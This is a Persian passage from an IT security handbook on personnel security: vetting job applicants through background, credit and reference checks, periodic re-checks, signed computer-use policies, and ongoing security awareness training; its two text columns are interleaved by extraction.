ﻭ ﮔﻮﻧﺎﮔﻮﻥ ﻫﺴﺘﻨﺪ ﻭ ﺑﺤﺚ ﻭ ﺑﺮﺭﺳﻲ ﺗﻤﺎﻣﻲ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﻛﺘـﺎﺏ
ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺳﻨﺪ ﻋﺪﻡ ﺳﻮﺀ ﭘﻴﺸﻴﻨﺔ ﺟﻨﺎﻳﻲ ﺑﺨﻮﺍﻫﻴﺪ؛ • ﻦ ﺁﻧﻬﺎ
ﻛﺎﻣﻞ ﻧﻴﺎﺯ ﺩﺍﺭﺩ؛ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺎ ﺗﻨﻬﺎ ﺑﻪ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﻣﻬﻤﺘﺮﻳ ﹺ
ﺳﻮﺍﺑﻖ ﺍﻋﺘﺒﺎﺭﻱ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴـﺪ ﺁﻳـﺎ • ﻣﻲ ﭘﺮﺩﺍﺯﻳﻢ .ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻧﻤﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﻭﻗـﻮﻉ
ﺑﺪﻫﻲﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺰﺭﮔﻲ ﺩﺍﺷﺘﻪﺍﻧﺪ ﻛﻪ ﺍﺯ ﭘـﺲ ﺁﻥ ﺑـﺮ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ ،ﺍﻣﺎ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ
ﻧﻴﺎﻣﺪﻩ ﺑﺎﺷﻨﺪ ﻳﺎ ﺧﻴﺮ .ﺍﮔﺮ ﻣﻮﺭﺩﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻳﺪ ﺩﺭﺑـﺎﺭﺓ ﺁﻥ ﻛﻪ ﺍﺯ ﺟﺎﻧﺐ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺧﻮﺩﺗـﺎﻥ ﻣﺘﻮﺟـﻪ ﺷـﺮﻛﺖ ﺷﻤﺎﺳـﺖ ﺭﺍ
ﺑﺎ ﺧﻮﺩ ﻣﺘﻘﺎﺿـﻲ ﮔﻔﺘﮕـﻮ ﻛﻨﻴـﺪ .ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﻣﻘـﺮﻭﺽ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ.
ﻫﺴﺘﻨﺪ ﻧﺒﺎﻳـﺪ ﺍﺯ ﻛـﺎﺭ ﻛـﺮﺩﻥ ﻣﺤـﺮﻭﻡ ﺷـﻮﻧﺪ؛ ﭼـﻮﻥ ﺩﺭ
ﺍﻳﻨﺼﻮﺭﺕ ﻫﻴﭽﮕﺎﻩ ﻗﺪﺭﺕ ﺑﺎﺯﭘﺮﺩﺍﺧﺖ ﺑـﺪﻫﻲﻫﺎﻳـﺸﺎﻥ ﺭﺍ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺍﺳﺘﺨﺪﺍﻡ
ﭘﻴﺪﺍ ﻧﺨﻮﺍﻫﻨﺪ ﻛﺮﺩ .ﺍﻟﺒﺘﻪ ﻧﺒﺎﻳـﺪ ﺍﺯ ﻧﻈـﺮ ﺩﻭﺭ ﺩﺍﺷـﺖ ﻛـﻪ
ﺍﺣﺘﻤﺎﻝ ﺑﺮﻭﺯ ﺭﻓﺘﺎﺭ ﻧﺎﺩﺭﺳﺖ ﻛﺎﺭﻱ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻧﻲﻛﻪ ﺗﺤـﺖ ﺑﺮﺭﺳﻲ ﭘﻴﺸﻴﻨﻪﻫﺎ
ﻓﺸﺎﺭﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻫﺴﺘﻨﺪ ﺑﻴﺸﺘﺮ ﺍﺳﺖ. ﻫﻨﮕﺎﻣﻴﻜﻪ ﻛﺎﺭﻛﻨﺎﻥ ﺟﺪﻳﺪ ﺭﺍ ﺍﺳﺘﺨﺪﺍﻡ ﻣﻲﻛﻨﻴﺪ ﭘﻴـﺸﻴﻨﺔ ﺁﻧﻬـﺎ ﺭﺍ
ﺑﻌﻤﻞ ﺁﻭﺭﺩﻥ ﺁﺯﻣـﻮﻥ ﺩﺭﻭﻍ ﺳـﻨﺠﻲ ﺍﺯ ﻣﺘﻘﺎﺿـﻲ ﺭﺍ )ﺍﮔـﺮ •
ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺧﻮﺍﺳـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ
ﻗﺎﻧﻮﻥ ﺑﻪ ﺷﻤﺎ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ( ﺍﺯ ﻧﻈـﺮ ﺩﻭﺭ ﻧﺪﺍﺭﻳـﺪ .ﮔﺮﭼـﻪ ﻓﺮﻣﻬﺎﻱ ﺍﺳﺘﺨﺪﺍﻣﻲ ﺭﺍ ﭘﺮ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﭼﻪ؟ ﺣـﺪﺍﻗﻞ ﻛـﺎﺭ
ﺁﺯﻣﻮﻧﻬﺎﻱ ﺩﺭﻭﻍﺳﻨﺠﻲ ﻫﻤﻴﺸﻪ ﺩﻗﻴﻖ ﻧﻴـﺴﺘﻨﺪ ،ﺍﻣـﺎ ﺍﮔـﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﻣﻲ ﻣﻨﺎﺑﻌﻲ ﻛﻪ ﻫﺮ ﻣﺘﻘﺎﺿﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻧﺪﻥ
ﻣﻮﻗﻌﻴــﺖ ﺷــﻐﻠﻲ ﺣــﺴﺎﺳﻲ ﺭﺍ ﺑــﺮﺍﻱ ﻣﺘﻘﺎﺿــﻲ ﺩﺭﻧﻈــﺮ ﺧﻮﺩ ﻣﻌﺮﻓﻲ ﻛﺮﺩﻩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑـﻪ ﮔﺬﺷـﺘﺔ ﺍﻭ -ﺍﺯ
ﮔﺮﻓﺘﻪﺍﻳﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻔﻴﺪ ﺑﺎﺷﻨﺪ. ﺟﻤﻠﻪ ﺩﻻﻳﻞ ﺗﺮﻙ ﻛﺎﺭﻫﺎﻱ ﻗﺒﻠـﻲﺍﺵ -ﭘـﻲ ﺑﺒﺮﻳـﺪ .ﻓﺮﺍﻣـﻮﺵ
ﻧﻜﻨﻴﺪ ﻛﻪ ﺩﺭ ﺑﺮﺭﺳﻲ ﺳﻮﺍﺑﻖ ،ﺗﺎﺭﻳﺦ ﺍﺳﺘﺨﺪﺍﻣﻬﺎ ﻭ ﺗﺮﻙ ﻛﺎﺭﻫﺎﻱ
ﺍﺯ ﻣﺘﻘﺎﺿﻲ ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺩﺭ ﺷﻐﻞ ﻣﺮﺑﻮﻃﻪ ﻳﻚ •
ﻗﺒﻠﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺎﺯﻩﻫﺎﻱ ﺧﺎﻟﻲ ﻣﻴﺎﻥ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺩﻗـﺖ ﻣـﻮﺭﺩ
ﺿﻤﺎﻧﺘﻨﺎﻣﻪ ﺑﻴﺎﻭﺭﺩ .ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻧﺠﺎﻡ ﺗﻤﺎﻣﻲ ﺍﻳـﻦ ﻣﺮﺍﺣـﻞ
١٦١ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺍﻃﻼﻋﺎﺕ ﭘـﺸﺖ ﺗﻠﻔـﻦ ﺑﺎﺷـﺪ .ﻣﻘﺎﻣـﺎﺕ ﺍﺟﺮﺍﻳـﻲ ﻧﺒﺎﻳـﺪ ﺑـﺪﻟﻴﻞ ﺑﺮﺍﻱ ﺍﺳﺘﺨﺪﺍﻡ ﻫﻤﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﻮﺻﻴﻪ ﻧﻤﻲﺷـﻮﺩ ،ﺍﻣـﺎ ﺩﺭ
ﻣﻮﻗﻌﻴﺘﺸﺎﻥ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻣﺴﺘﺜﻨﻲ ﺷـﻮﻧﺪ -ﺁﻧﻬـﺎ ﻫـﻢ ﺍﮔـﺮ ﻧـﻪ ﻣﻮﺭﺩ ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺩﺭ ﭘﺴﺘﻬﺎﻳﻲ ﻛﺎﺭ ﻛﻨﻨﺪ ﻛﻪ
ﺑﻴﺸﺘﺮ ،ﺣﺪﺍﻗﻞ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﺭﻛﻨﺎﻥ ﺩﻳﮕﺮ ﺩﺭ ﻣﻌﺮﺽ ﺍﻧﺘﺨﺎﺏ ﺭﻣـﺰ ﺩﺭ ﺁﻧﻬﺎ ﺑﻪ ﺳﻄﺢ ﺑﺎﻻﻳﻲ ﺍﺯ ﺍﻋﺘﻤﺎﺩ ﻧﻴﺎﺯ ﺍﺳـﺖ ﻭ ﺷـﺎﻏﻠﻴﻦ
ﻋﺒﻮﺭ ﺿﻌﻴﻒ ﻭ ﺳﺎﻳﺮ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻫﺴﺘﻨﺪ .ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳـﺪ ﭘﺎﻳﺒﻨـﺪﻱ ﻧﻴﺰ ﺍﺯ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻭﻳـﮋﻩ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﻣـﻲﺷـﻮﻧﺪ -ﻣﺜـﻞ
ﺧﻮﺩ ﺑﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﻨﺪ ،ﭼﺮﺍﻛﻪ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺟﺬﺏ ﻭ ﻳﺎ ﺍﺧﺮﺍﺝ ﻛﺎﺭﻛﻨﺎﻥ -ﺑﺎﻳﺪ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﺑﻴـﺸﺘﺮﻱ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ﺑﺎﻻ ﺑﻪ ﭘﺎﺋﻴﻦ ﺟﺮﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﻭ ﻧﻪ ﺑﺎﻟﻌﻜﺲ. ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ .ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲ ﻛﻨﻴﻢ ﺑﻪ ﻣﺘﻘﺎﺿﻲ ﺍﻃﻼﻉ ﺩﻫﻴﺪ
ﺁﻣﻮﺯﺵ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺍﺳﻨﺎﺩ ﻧﻮﺷﺘﺎﺭﻱ ﻭ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﭼﻨﻴﻦ ﺑﺮﺭﺳﻴﻬﺎﻳﻲ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭ ﺑـﺮﺍﻱ
ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪ ﺷﻮﺩ ﻭ ﻣﺒﺎﺣﺜﻲ ﭼﻮﻥ ﻛـﺎﺭﺑﺮﺩ ﺩﺭﺳـﺖ ﻭ ﻧﺎﺩﺭﺳـﺖ ﺍﻳﻨﻜﺎﺭ ﺭﺿﺎﻳﺖ ﺍﻭ ﺭﺍ ﻧﻴﺰ ﺟﻠﺐ ﻛﻨﻴﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﺮﭼﻨﺪ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ،ﺍﺳﺘﻔﺎﺩﺓ ﺷﺨﺼﻲ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧـﻪﺍﻱ )ﺩﺭ
ﺿﺮﻭﺭﻱ ﻧﻴﺴﺖ ﻭﻟﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻧﺠـﺎﻡ ﺑﺮﺭﺳـﻴﻬﺎ
ﺭﺍﺣﺖﺗﺮ ﺷـﻮﺩ ﻭ ﻣﺘﻘﺎﺿـﻲ ﻣﺘﻮﺟـﻪ ﺑﺎﺷـﺪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ
ﺧﻼﻝ ﻭ ﺑﻌﺪ ﺍﺯ ﺍﺗﻤﺎﻡ ﺳـﺎﻋﺎﺕ ﻛـﺎﺭ( ،ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻣﺎﻟﻜﻴـﺖ ﻭ ﻛـﺎﺭﺑﺮﺩ
ﺍﺳﺘﺨﺪﺍﻡ ﻭﻱ ﻣﺤﺘﺎﻁ ﻭ ﺟـﺪﻱ ﻫـﺴﺘﻴﺪ .ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ
ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﻭﺭﻭﺩ ﻭ ﺧــﺮﻭﺝ
ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻪ ﺍﺟﺎﺯﺓ ﺻﺮﻳﺢ ﻣﺘﻘﺎﺿﻲ ﻧﻴـﺎﺯ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺩﺭ ﺑﺮ ﮔﻴﺮﺩ .ﻣﺠﺎﺯﺍﺗﻬﺎﻱ ﻧﻘـﺾ ﻣﻘـﺮﺭﺍﺕ
ﺩﺍﺭﻳﺪ.
ﻧﻴﺰ ﺑﺎﻳﺪ ﻫﻨﮕﺎﻡ ﺁﻣﻮﺯﺵ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﻮﻧﺪ.
ﺑﺨﺶ ﺳﻮﻡ
ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﻓﺮﻣﻬﺎﻳﻲ ﻣﺒﻨﻲ ﺑﺮ ﺁﮔﺎﻫﻲ ﺍﺯ ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻣﺠﺪﺩ ﻭ ﺩﻭﺭﻩﺍﻱ
ﭘﺬﻳﺮﻓﺘﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺁﻥ ﺍﻣﻀﺎ ﻛﻨﻨﺪ .ﺍﻳﻦ ﻓﺮﻣﻬـﺎ ﺑﺎﻳـﺪ ﺳـﺎﻟﻬﺎ ﺯﻣﺎﻧﻲ ﻛﻪ ﺁﺯﻣﻮﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩ ﻭ ﻣﺘﻘﺎﺿﻲ ﺭﺍ ﺍﺳـﺘﺨﺪﺍﻡ
ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ ﺗﺎ ﺍﮔﺮ ﺑﻌﺪﻫﺎ ﺍﻳﻦ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﺷﺪ ﻛـﻪ ﺁﻳـﺎ ﺑـﻪ ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺑﻌﻀﻲ ﺍﺯ ﺑﺮﺭﺳﻴﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﻣﺠﺪﺩﹰﺍ ﺍﻧﺠـﺎﻡ
ﻛﺎﺭﻣﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﭽﻪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻗﺒﺎﻝ ﻭﻱ ﻣﺠﺎﺯ ﺑﻪ ﺍﻧﺠـﺎﻡ ﺩﻫﻴﺪ .ﭘﺲ ﺍﺯ ﺁﻥ ﺑﺎﻳﺪ ﻧﺘﺎﻳﺞ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻓﻌﻠﻲ ﻭ ﻗﺒﻠﻲ ﺭﺍ ﺑـﺎ ﻫـﻢ
ﺁﻥ ﺍﺳﺖ ﺁﮔﺎﻫﻲ ﻗﺒﻠﻲ ﺩﺍﺩﻩ ﺷﺪﻩ ﻳﺎ ﺧﻴـﺮ ،ﺑﺘـﻮﺍﻥ ﻳـﻚ ﻣـﺪﺭﻙ ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﺪ ﺗﺎ ﺑﻪ ﺗﻐﻴﻴـﺮﺍﺕ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﭘـﻲ ﺑﺒﺮﻳـﺪ .ﺑﻌـﻀﻲ
ﺍﺛﺒﺎﺕﻛﻨﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻛﺮﺩ. ﺗﻐﻴﻴﺮﺍﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻴﺎﺯ ﺑﻪ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻋﻤﻴﻘﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﻛﺎﺭﻣﻨﺪﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣـﺴﺌﻮﻝ ﺳﻴـﺴﺘﻢ
ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻣﺪﺍﻭﻡ
ﺣــﺴﺎﺑﺪﺍﺭﻱ ﺷــﻤﺎ -ﺍﺯ ﺟﻤﻠــﻪ ﺗﻬﻴــﺔ ﭼﻜﻬــﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺮﺍﻱ
ﻛﺎﺭﺑﺮﺍﻥ ﻻﺯﻡ ﺍﺳﺖ ﺑﻄﻮﺭ ﻣﺘﻨﺎﻭﺏ ﺍﻃﻼﻋﺎﺕ ﺗﺎﺯﻩﺍﻱ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ
ﺑــﺴﺘﺎﻧﻜﺎﺭﺍﻥ -ﺑﺎﺷــﺪ ،ﺷــﺎﻳﺪ ﻻﺯﻡ ﺑﺎﺷــﺪ ﺍﻋﺘﺒــﺎﺭ ﻣﻮﺟــﻮﺩ ﺩﺭ
ﺍﻣﻨﻴﺖ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﺻﺤﻴﺢ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ .ﺍﻳﻦ ﺑـﺎﺯﺁﻣﻮﺯﻱ
ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺍﻭ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺎﺯﻩﻫـﺎﻱ ﻛﻮﺗـﺎﻩ ﺯﻣـﺎﻧﻲ ﺑﺮﺭﺳـﻲ
ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻓﺮﺻﺖ ﻣﻨﺎﺳـﺒﻲ ﺟﻬـﺖ ﻳـﺎﺩﺁﻭﺭﻱ ﺗﻬﺪﻳـﺪﻫـﺎﻱ
ﻛﻨﻴﺪ .ﺍﮔﺮ ﺑﺮﺭﺳﻲ ﻭ ﺗﺤﻘﻴﻖ ﻣﺠﺪﺩ ﺷﻤﺎ ﻫﺮ ﺩﻭ ﺳﺎﻝ ﻳﻜﺒﺎﺭ ﺍﻧﺠﺎﻡ
ﻣﻮﺟــﻮﺩ ﻭ ﭘﻴﺎﻣــﺪﻫﺎﻱ ﺁﻧﻬــﺎ ﺑﻮﺟــﻮﺩ ﻣــﻲﺁﻭﺭﺩ ﻭ ﻳــﻚ ﻓــﻀﺎﻱ
ﺷﻮﺩ ﻭ ﺩﺭﻳﺎﺑﻴﺪ ﻛﻪ ﺭﻓﺘﺎﺭ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧـﺎﺭﺝ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﻣﺒﺎﺣﺜﻪﺍﻱ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻧﻈﺮ ﻭ ﺩﺭ ﻣﻴﺎﻥ ﮔﺬﺍﺷﺘﻦ ﻧﮕﺮﺍﻧﻴﻬﺎ ﺍﻳﺠـﺎﺩ
ﺗﻌﻴﻴﻦﺷﺪﻩ ﺍﺳﺖ ،ﻋﻠﻲﺍﻟﻘﺎﻋﺪﻩ ﺗﺼﻤﻴﻢ ﺧﻮﺍﻫﻴﺪ ﮔﺮﻓﺖ ﻛـﻪ ﺩﺭ ﺁﻥ
ﻣﻲﻛﻨﺪ.
ﻣﻮﺭﺩ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺑﻌﻤﻞ ﺑﻴﺎﻭﺭﻳﺪ.
ﻻﺯﻡ ﺍﺳﺖ ﺑﻪ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻓﺮﺻـﺖ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ ﺁﻣﻮﺯﺷـﻬﺎﻱ
ﺟﺎﺭﻱ ﻭ ﺁﺗﻲ ﺑﺪﻫﻴﺪ؛ ﻣﺜﻞ ﺗﺸﻮﻳﻖ ﺑـﻪ ﺣـﻀﻮﺭ ﺩﺭ ﻛﻨﻔﺮﺍﻧـﺴﻬﺎ ﻭ ﺁﻣﻮﺯﺵ ﺍﻭﻟﻴﻪ
ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺣﺮﻓﻪﺍﻱ ،ﺍﺷﺘﺮﺍﻙ ﺩﺭ ﻧﺸﺮﻳﻪﻫﺎﻱ ﺍﺩﻭﺍﺭﻱ ﺣﺮﻓـﻪﺍﻱ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷـﻤﺎ ﺩﺭ ﻣـﻮﺭﺩ ﻳـﻚ ﻛﺎﺭﻣﻨـﺪ ﻧﺒﺎﻳـﺪ ﭘـﺲ ﺍﺯ
ﻭ ﺗﺠﺎﺭﻱ ،ﻭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﻛﺘﺎﺑﻬﺎﻱ ﻣﺮﺟﻊ ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺁﻣﻮﺯﺷﻲ. ﺍﺳﺘﺨﺪﺍﻡ ﺍﻭ ﻣﺘﻮﻗﻒ ﺷﻮﺩ .ﻫﺮ ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﻪ ﺣﺘﻤـﹰﺎ ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ
ﺑﺎﻳــﺪ ﺑــﻪ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﺯﻣــﺎﻥ ﻛــﺎﻓﻲ ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺘــﺐ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﺁﻣﻮﺯﺷﻬﺎﻱ ﺯﻳﺮﺑﻨﺎﻳﻲ ﺑﺒﻴﻨﺪ .ﺍﻳﻦ ﺁﻣـﻮﺯﺵ ﺩﺭ
ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﻳﺎﺩﮔﻴﺮﻱ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺩﺍﺩﻩ ﺷﻮﺩ. ﺣﺎﻟﺖ ﺣﺪﺍﻗﻠﻲ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺘﺨﺎﺏ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
ﺭﻣﺰ ﻋﺒﻮﺭ ،ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎ )ﺍﻳﻨﻜـﻪ
ﺩﺭ ﻛﻨﺎﺭ ﺁﻣﻮﺯﺵ ﺩﻭﺭﻩ ﺍﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ
ﭼﻪ ﻛﺴﻲ ﻣﺠﺎﺯ ﺍﺳﺖ ﺑﻪ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺘﺼﻞ ﺷﻮﺩ ﻭ ﭼﮕﻮﻧﻪ( ،ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﻪ
ﻼ ﻧـﺼﺐ ﻣﺘﻨﻮﻉﺗﺮﻱ ﺑﺮﺍﻱ ﺗﺪﺍﻭﻡ ﺍﻳﻦ ﺭﻭﻧﺪ ﺑﻬـﺮﻩ ﮔﻴﺮﻳـﺪ -ﻣـﺜ ﹰ
ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﻧﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ،ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﺗﻤـﺎﺱ
ﭘﻮﺳﺘﺮﻫﺎ ﻳﺎ ﺍﻋﻼﻣﻴﻪﻫﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻟﮕﻮﻫـﺎﻱ ﺳـﺮﺁﻣﺪﻱ ،ﺍﻋـﻼﻡ
ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺎ ﺷــﺮﻛﺖ )ﺍﺯ ﻃﺮﻳــﻖ ﺗﻠﻔــﻦ( ،ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﻓــﺸﺎﻱ
ﺷﻌﺎﺭﻫﺎﻱ ﺭﻭﺯﺍﻧﻪ ﻭ ﻫﻔﺘﮕﻲ ،ﻧﺎﻣﮕﺬﺍﺭﻱ ﻳﻚ ﺭﻭﺯ ﺑﻪ ﻋﻨـﻮﺍﻥ "ﺭﻭﺯ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٦٢
ﺑﺎﻻ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﺭﺍ ﺑﺎﻳﺪ ﻛﻨﺘﺮﻝ ﻛﺮﺩ .ﺗﺸﺨﻴﺺ ﺍﻳﻦ ﻣـﺸﻜﻼﺕ ﻭ ﺍﻣﻨﻴﺖ" ،ﻭ ﻳﺎ ﺑﺮﮔﺰﺍﺭﻱ ﻧﺸﺴﺘﻬﺎ ﻭ ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﻪ ﻣﻨﻈﻮﺭ
ﻞ ﺍﻧـﺴﺎﻧﻴﺖ ﺍﺳـﺖ.ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻛﻤﻚ ﺑﻪ ﺭﻓﻊ ﺁﻧﻬـﺎ ﺣـﺪﺍﻗ ﹺ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻛﻤﺮﻧﮓ ﺷﺪﻥ ﺍﻫﻤﻴﺖ ﻣﻮﺿـﻮ ﹺﻉ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻣﻨﻈـﺮ
